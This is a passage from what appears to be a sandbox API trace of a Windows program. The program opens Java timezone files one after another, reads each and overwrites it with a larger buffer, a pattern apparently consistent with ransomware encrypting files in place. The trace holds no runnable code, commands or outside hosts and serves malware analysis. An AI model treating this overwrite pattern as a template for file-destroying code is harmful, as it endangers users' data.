lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0xcd [0140.667] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0140.667] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.009] ReleaseMutex (hMutex=0x168) returned 1 [0141.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Eucla", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.009] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Eucla", cchWideChar=5, lpMultiByteStr=0x1f7ad2c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Eucla", lpUsedDefaultChar=0x0) returned 5 [0141.009] ReadFile (in: hFile=0x1cc, lpBuffer=0x1ed19f8, nNumberOfBytesToRead=0xcd, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1ed19f8*, lpNumberOfBytesRead=0x311f2bc*=0xcd, lpOverlapped=0x0) returned 1 [0141.011] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0141.011] WriteFile (in: hFile=0x1cc, lpBuffer=0x26cf048*, nNumberOfBytesToWrite=0x655, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x26cf048*, lpNumberOfBytesWritten=0x311f2d0*=0x655, lpOverlapped=0x0) returned 1 [0141.011] CloseHandle (hObject=0x1cc) returned 1 [0141.011] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\CST6CDT" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\cst6cdt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0141.014] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.015] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x4f8 [0141.015] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.015] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.028] ReleaseMutex (hMutex=0x168) returned 1 [0141.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CST6CDT", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0141.028] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="CST6CDT", cchWideChar=7, lpMultiByteStr=0x1f7ad2c, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CST6CDT", lpUsedDefaultChar=0x0) returned 7 [0141.028] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f3e3a8, nNumberOfBytesToRead=0x4f8, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3e3a8*, lpNumberOfBytesRead=0x311f2bc*=0x4f8, lpOverlapped=0x0) returned 1 [0141.035] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0141.036] WriteFile (in: hFile=0x1cc, lpBuffer=0x1ea4488*, nNumberOfBytesToWrite=0xa80, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1ea4488*, lpNumberOfBytesWritten=0x311f2d0*=0xa80, lpOverlapped=0x0) returned 1 [0141.036] CloseHandle (hObject=0x1cc) returned 1 [0141.036] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+12" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+12"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0141.037] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.037] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1b [0141.037] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.037] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.046] ReleaseMutex (hMutex=0x168) returned 1 [0141.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT+12", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0141.046] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT+12", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT+12", lpUsedDefaultChar=0x0) returned 6 [0141.046] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f88d30, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88d30*, lpNumberOfBytesRead=0x311f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0141.047] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0141.047] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x311f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0141.048] CloseHandle (hObject=0x1cc) returned 1 [0141.048] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT+9" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt+9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0141.049] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.049] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1b [0141.049] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.049] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.063] ReleaseMutex (hMutex=0x168) returned 1 [0141.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT+9", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.063] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT+9", cchWideChar=5, lpMultiByteStr=0x1f7ad2c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT+9", lpUsedDefaultChar=0x0) returned 5 [0141.063] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f88d30, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88d30*, lpNumberOfBytesRead=0x311f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0141.064] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0141.065] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x311f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0141.065] CloseHandle (hObject=0x1cc) returned 1 [0141.065] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\GMT-3" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\gmt-3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0141.066] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.066] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1b [0141.066] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.066] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.076] ReleaseMutex (hMutex=0x168) returned 1 [0141.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-3", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.076] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="GMT-3", cchWideChar=5, lpMultiByteStr=0x1f7ad44, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="GMT-3", lpUsedDefaultChar=0x0) returned 5 [0141.076] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f88d30, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88d30*, lpNumberOfBytesRead=0x311f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0141.077] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0141.078] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x311f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0141.078] CloseHandle (hObject=0x1cc) returned 1 [0141.078] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Etc\\UTC" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\etc\\utc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0141.079] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.079] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x1b [0141.079] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.079] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.086] ReleaseMutex (hMutex=0x168) returned 1 [0141.086] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UTC", cchWideChar=3, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3 [0141.087] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="UTC", cchWideChar=3, lpMultiByteStr=0x1f7ad5c, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="UTC", lpUsedDefaultChar=0x0) returned 3 [0141.087] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f88d30, nNumberOfBytesToRead=0x1b, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f88d30*, lpNumberOfBytesRead=0x311f2bc*=0x1b, lpOverlapped=0x0) returned 1 [0141.088] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0141.088] WriteFile (in: hFile=0x1cc, lpBuffer=0x1eff4b8*, nNumberOfBytesToWrite=0x5a3, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eff4b8*, lpNumberOfBytesWritten=0x311f2d0*=0x5a3, lpOverlapped=0x0) returned 1 [0141.088] CloseHandle (hObject=0x1cc) returned 1 [0141.088] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Budapest" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\budapest"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0141.089] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.089] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x520 [0141.089] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.089] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.102] ReleaseMutex (hMutex=0x168) returned 1 [0141.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Budapest", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0141.102] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Budapest", cchWideChar=8, lpMultiByteStr=0x1f7362c, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Budapest", lpUsedDefaultChar=0x0) returned 8 [0141.102] ReadFile (in: hFile=0x1cc, lpBuffer=0x1f3e3a8, nNumberOfBytesToRead=0x520, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f3e3a8*, lpNumberOfBytesRead=0x311f2bc*=0x520, lpOverlapped=0x0) returned 1 [0141.165] SetFilePointer (in: hFile=0x1cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0141.165] WriteFile (in: hFile=0x1cc, lpBuffer=0x2870fb8*, nNumberOfBytesToWrite=0xaa8, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x2870fb8*, lpNumberOfBytesWritten=0x311f2d0*=0xaa8, lpOverlapped=0x0) returned 1 [0141.165] CloseHandle (hObject=0x1cc) returned 1 [0141.194] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Kiev" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\kiev"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0141.194] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.195] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x418 [0141.205] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.205] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.205] ReleaseMutex (hMutex=0x168) returned 1 [0141.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kiev", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0141.205] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Kiev", cchWideChar=4, lpMultiByteStr=0x1f7ad2c, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Kiev", lpUsedDefaultChar=0x0) returned 4 [0141.205] ReadFile (in: hFile=0x1dc, lpBuffer=0x269cae8, nNumberOfBytesToRead=0x418, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269cae8*, lpNumberOfBytesRead=0x311f2bc*=0x418, lpOverlapped=0x0) returned 1 [0141.223] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0141.224] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9a0, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x311f2d0*=0x9a0, lpOverlapped=0x0) returned 1 [0141.224] CloseHandle (hObject=0x1dc) returned 1 [0141.224] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Moscow" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\moscow"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0141.225] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.225] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x2b5 [0141.225] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.225] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.226] ReleaseMutex (hMutex=0x168) returned 1 [0141.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Moscow", cchWideChar=6, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 6 [0141.226] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Moscow", cchWideChar=6, lpMultiByteStr=0x1f7ad2c, cbMultiByte=6, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Moscow", lpUsedDefaultChar=0x0) returned 6 [0141.226] ReadFile (in: hFile=0x1dc, lpBuffer=0x286cf78, nNumberOfBytesToRead=0x2b5, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x286cf78*, lpNumberOfBytesRead=0x311f2bc*=0x2b5, lpOverlapped=0x0) returned 1 [0141.227] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0141.227] WriteFile (in: hFile=0x1dc, lpBuffer=0x25a7bc8*, nNumberOfBytesToWrite=0x83d, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x25a7bc8*, lpNumberOfBytesWritten=0x311f2d0*=0x83d, lpOverlapped=0x0) returned 1 [0141.227] CloseHandle (hObject=0x1dc) returned 1 [0141.227] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Sofia" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\sofia"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0141.228] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.228] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x440 [0141.228] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.228] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.228] ReleaseMutex (hMutex=0x168) returned 1 [0141.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Sofia", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0141.228] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Sofia", cchWideChar=5, lpMultiByteStr=0x1f7ad2c, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Sofia", lpUsedDefaultChar=0x0) returned 5 [0141.229] ReadFile (in: hFile=0x1dc, lpBuffer=0x269cae8, nNumberOfBytesToRead=0x440, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x269cae8*, lpNumberOfBytesRead=0x311f2bc*=0x440, lpOverlapped=0x0) returned 1 [0141.239] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0141.239] WriteFile (in: hFile=0x1dc, lpBuffer=0x1eac3d8*, nNumberOfBytesToWrite=0x9c8, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x1eac3d8*, lpNumberOfBytesWritten=0x311f2d0*=0x9c8, lpOverlapped=0x0) returned 1 [0141.239] CloseHandle (hObject=0x1dc) returned 1 [0141.239] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Europe\\Volgograd" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\europe\\volgograd"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0141.240] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.240] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x235 [0141.240] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 [0141.241] WaitForSingleObject (hHandle=0x168, dwMilliseconds=0xffffffff) returned 0x0 [0141.241] ReleaseMutex (hMutex=0x168) returned 1 [0141.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Volgograd", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0141.241] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Volgograd", cchWideChar=9, lpMultiByteStr=0x1f735ac, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Volgograd", lpUsedDefaultChar=0x0) returned 9 [0141.241] ReadFile (in: hFile=0x1dc, lpBuffer=0x1f65158, nNumberOfBytesToRead=0x235, lpNumberOfBytesRead=0x311f2bc, lpOverlapped=0x0 | out: lpBuffer=0x1f65158*, lpNumberOfBytesRead=0x311f2bc*=0x235, lpOverlapped=0x0) returned 1 [0141.242] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f300*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x311f300*=0) returned 0x0 [0141.242] WriteFile (in: hFile=0x1dc, lpBuffer=0x288f968*, nNumberOfBytesToWrite=0x7bd, lpNumberOfBytesWritten=0x311f2d0, lpOverlapped=0x0 | out: lpBuffer=0x288f968*, lpNumberOfBytesWritten=0x311f2d0*=0x7bd, lpOverlapped=0x0) returned 1 [0141.242] CloseHandle (hObject=0x1dc) returned 1 [0141.243] CreateFileW (lpFileName="C:\\Program Files (x86)\\Java\\jre7\\lib\\zi\\Indian\\Christmas" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\zi\\indian\\christmas"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1dc [0141.243] SetFilePointer (in: hFile=0x1dc, lDistanceToMove=0, lpDistanceToMoveHigh=0x311f8c0*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x311f8c0*=0) returned 0x0 